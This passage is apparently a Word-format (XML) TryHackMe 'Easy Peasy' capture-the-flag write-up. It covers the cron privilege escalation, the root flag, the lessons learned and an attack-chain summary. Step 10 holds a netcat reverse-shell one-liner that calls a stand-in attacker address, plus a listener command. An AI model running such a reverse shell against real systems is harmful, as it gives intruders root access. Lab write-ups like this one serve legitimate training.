          <w:top w:val="single" w:color="1C2833" w:sz="2"/>
          <w:left w:val="single" w:color="1C2833" w:sz="2"/>
          <w:bottom w:val="single" w:color="1C2833" w:sz="2"/>
          <w:right w:val="single" w:color="1C2833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C283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ECC71"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cat /etc/crontab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F1C40F" w:sz="4"/>
          <w:left w:val="single" w:color="F1C40F" w:sz="4"/>
          <w:bottom w:val="single" w:color="F1C40F" w:sz="4"/>
          <w:right w:val="single" w:color="F1C40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EF9E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2631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">⚡ Vulnerable Cronjob Found!</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1B2631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">A root-owned cron entry ran every minute:  *  *  *  *  *  root  cd /var/www/ &amp;&amp; sudo bash .mysecretcronjob.sh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Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Checked the script's permissions:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1C2833" w:sz="2"/>
          <w:left w:val="single" w:color="1C2833" w:sz="2"/>
          <w:bottom w:val="single" w:color="1C2833" w:sz="2"/>
          <w:right w:val="single" w:color="1C2833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C283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ECC71"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cd /var/www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ECC71"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ls -la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F1C40F" w:sz="4"/>
          <w:left w:val="single" w:color="F1C40F" w:sz="4"/>
          <w:bottom w:val="single" w:color="F1C40F" w:sz="4"/>
          <w:right w:val="single" w:color="F1C40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EF9E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2631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">⚡ Critical Misconfiguration!</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1B2631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">.mysecretcronjob.sh was world-writable — any user, including boring, could edit a script executed by root every minute.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2631"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 10 — Reverse Shell via Cron</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Appended a reverse-shell one-liner to the writable script:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1C2833" w:sz="2"/>
          <w:left w:val="single" w:color="1C2833" w:sz="2"/>
          <w:bottom w:val="single" w:color="1C2833" w:sz="2"/>
          <w:right w:val="single" w:color="1C2833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C283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ECC71"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2&gt;&amp;1 | nc &lt;ATTACKER_IP&gt; &lt;PORT&gt; &gt;/tmp/f</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Started a listener on the attacking machine:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1C2833" w:sz="2"/>
          <w:left w:val="single" w:color="1C2833" w:sz="2"/>
          <w:bottom w:val="single" w:color="1C2833" w:sz="2"/>
          <w:right w:val="single" w:color="1C2833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C283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ECC71"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">nc -lvnp 4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Waited under a minute for the cron job to fire — got a callback, then confirmed privilege level:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1C2833" w:sz="2"/>
          <w:left w:val="single" w:color="1C2833" w:sz="2"/>
          <w:bottom w:val="single" w:color="1C2833" w:sz="2"/>
          <w:right w:val="single" w:color="1C2833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C283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ECC71"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">whoami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27AE60" w:sz="4"/>
          <w:left w:val="single" w:color="27AE60" w:sz="4"/>
          <w:bottom w:val="single" w:color="27AE60" w:sz="4"/>
          <w:right w:val="single" w:color="27AE6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AF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2631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">⚡ ROOT SHELL OBTAINED! 🎉</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1B2631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">whoami returned root — the cronjob privesc worked.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2631"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 11 — Root Flag</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1C2833" w:sz="2"/>
          <w:left w:val="single" w:color="1C2833" w:sz="2"/>
          <w:bottom w:val="single" w:color="1C2833" w:sz="2"/>
          <w:right w:val="single" w:color="1C2833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C283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ECC71"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cd /root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ECC71"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ls -la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ECC71"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cat .root.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="3498DB" w:sz="4"/>
          <w:left w:val="single" w:color="3498DB" w:sz="4"/>
          <w:bottom w:val="single" w:color="27AE60" w:sz="4"/>
          <w:right w:val="single" w:color="3498D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BF5FB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631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">❓ Q: What was the privilege escalation vector?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="EAFAF1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449"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✅ A: A world-writable script executed every minute by root via cron — edited it to spawn a reverse shell.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C0392B" w:sz="12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C0392B"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">💡 Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Always check page source and robots.txt on every web service — even 'default' pages can hide clues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Directory brute-forcing (DirBuster) is worth re-running per host/port; results differ between them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Not every hash-cracker has the same lookup database — if one fails, try another before giving up.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Steganography tools like Steghide are worth trying whenever a suspicious image shows up.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Always check crontab entries and file permissions (`ls -la`) on any script that root executes — a writable root-run script is an instant privesc path.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B" w:sz="12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C0392B"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">⚔ Attack Chain Summary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700"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/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W w:type="dxa" w:w="7700"/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</w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="FDEDE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Step 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7700"/>
            <w:shd w:fill="FDEDE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B2631"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Nmap scan → found ports 80 (nginx), 6498 (SSH), 65524 (Apache)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/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Step 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7700"/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B2631"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">DirBuster on port 80 → found /hidden/ and /hidden/whatever/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="FDEDE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Step 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7700"/>
            <w:shd w:fill="FDEDE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B2631"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Decoded hidden string in page source → Flag 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/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Step 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7700"/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B2631"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cracked hash in robots.txt on port 65524 → Flag 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="FDEDE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Step 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7700"/>
            <w:shd w:fill="FDEDE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B2631"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Read default Apache page text → Flag 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/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Step 6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7700"/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B2631"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Decoded Base64 hint → found new hidden directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="FDEDE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Step 7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7700"/>
            <w:shd w:fill="FDEDE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B2631"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cracked hash → password → Steghide extracted hidden creds from image</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/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Step 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7700"/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B2631"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">SSH login → ROT13-decoded user flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="FDEDE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Step 9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7700"/>
            <w:shd w:fill="FDEDE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B2631"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Found world-writable root cronjob script</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/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Step 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7700"/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B2631"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Injected reverse shell into script → caught root shell via Netcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="FDEDE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Step 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7700"/>
            <w:shd w:fill="FDEDE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B2631"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Read /root/.root.txt → root flag captured</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="BFC9CA" w:sz="6" w:space="8"/>
        </w:pBdr>
        <w:spacing w:before="200"/>
        <w:jc w:val="center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TryHackMe | Easy Peasy | Write-Up by Prassanna Balaji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2026-07-08T15:30:59.126Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-08T15:30:59.127Z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